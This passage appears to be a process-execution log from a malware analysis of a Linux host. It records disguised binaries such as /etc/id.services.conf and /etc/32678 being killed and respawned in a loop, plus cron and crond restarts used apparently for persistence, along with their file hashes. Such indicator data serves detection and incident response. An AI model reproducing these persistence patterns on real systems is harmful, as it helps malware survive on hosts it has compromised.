                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:48:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/pkill
                                                            Arguments:pkill -9 32678
                                                            File size:30968 bytes
                                                            MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sh
                                                            Arguments:sh -c /etc/32678&
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sh
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:/etc/32678
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sleep
                                                            Arguments:sleep 60
                                                            File size:39256 bytes
                                                            MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                            Start time (UTC):22:49:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:/etc/id.services.conf
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:49:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:49:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/pkill
                                                            Arguments:pkill -9 32678
                                                            File size:30968 bytes
                                                            MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sh
                                                            Arguments:sh -c /etc/32678&
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sh
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:/etc/32678
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sleep
                                                            Arguments:sleep 60
                                                            File size:39256 bytes
                                                            MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                            Start time (UTC):22:50:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:/etc/id.services.conf
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:50:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:50:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/pkill
                                                            Arguments:pkill -9 32678
                                                            File size:30968 bytes
                                                            MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sh
                                                            Arguments:sh -c /etc/32678&
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sh
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:/etc/32678
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sleep
                                                            Arguments:sleep 60
                                                            File size:39256 bytes
                                                            MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:service crond start
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl --quiet is-active multi-user.target
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl list-unit-files --full --type=socket
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sed
                                                            Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                            File size:121288 bytes
                                                            MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                            Start time (UTC):22:50:24
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl start crond.service
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:50:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:/etc/id.services.conf
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:service crond start
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl --quiet is-active multi-user.target
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl list-unit-files --full --type=socket
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sed
                                                            Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                            File size:121288 bytes
                                                            MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                            Start time (UTC):22:49:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl start crond.service
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:49:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:/etc/id.services.conf
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:service crond start
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl --quiet is-active multi-user.target
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl list-unit-files --full --type=socket
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sed
                                                            Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                            File size:121288 bytes
                                                            MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                            Start time (UTC):22:48:20
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl start crond.service
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:48:18
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:/etc/id.services.conf
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:15
                                                            Start date (UTC):25/11/2024
                                                            Path:/boot/System.img.config
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:15
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:service crond start
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl --quiet is-active multi-user.target
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:17
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:17
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:17
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl list-unit-files --full --type=socket
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:17
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:17
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sed
                                                            Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                            File size:121288 bytes
                                                            MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                            Start time (UTC):22:47:25
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl start crond.service
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:15
                                                            Start date (UTC):25/11/2024
                                                            Path:/boot/System.img.config
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/boot/System.img.config
                                                            Arguments:/boot/System.img.config
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:22
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/udisks2/udisksd
                                                            Arguments:-
                                                            File size:483056 bytes
                                                            MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                            Start time (UTC):22:47:22
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/dumpe2fs
                                                            Arguments:dumpe2fs -h /dev/dm-0
                                                            File size:31112 bytes
                                                            MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                            Start time (UTC):22:47:25
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:25
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:/usr/sbin/sshd -D -R
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:25
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:25
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:/usr/sbin/sshd -D -R
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:26
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/systemd
                                                            Arguments:-
                                                            File size:1620224 bytes
                                                            MD5 hash:9b2bec7092a40488108543f9334aab75

                                                            Start time (UTC):22:47:26
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:/usr/sbin/cron -f
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                            Start time (UTC):22:48:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:-
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                            Start time (UTC):22:48:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:-
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                            Start time (UTC):22:48:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/sh
                                                            Arguments:/bin/sh -c "/.img "
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/sh
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:26
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:26
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:/usr/sbin/sshd -D -R
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:26
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:27
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:27
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:/usr/sbin/sshd -D -R
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:27
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:29
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:29
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:/usr/sbin/sshd -D -R
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:29
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:32
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:32
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:/usr/sbin/sshd -D -R
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:32
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:32
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:/usr/sbin/sshd -D -R
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:32
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:33
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:33
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:/usr/sbin/sshd -D -R
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:33
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                                            Start time (UTC):22:47:37
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                            Start time (UTC):22:47:37
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:/usr/sbin/sshd -D -R
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                            Start time (UTC):22:47:37
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/sshd
                                                            Arguments:-
                                                            File size:876328 bytes
                                                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                            Start time (UTC):22:48:02
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/systemd
                                                            Arguments:-
                                                            File size:1620224 bytes
                                                            MD5 hash:9b2bec7092a40488108543f9334aab75
                                                            Start time (UTC):22:48:02
                                                            Start date (UTC):25/11/2024
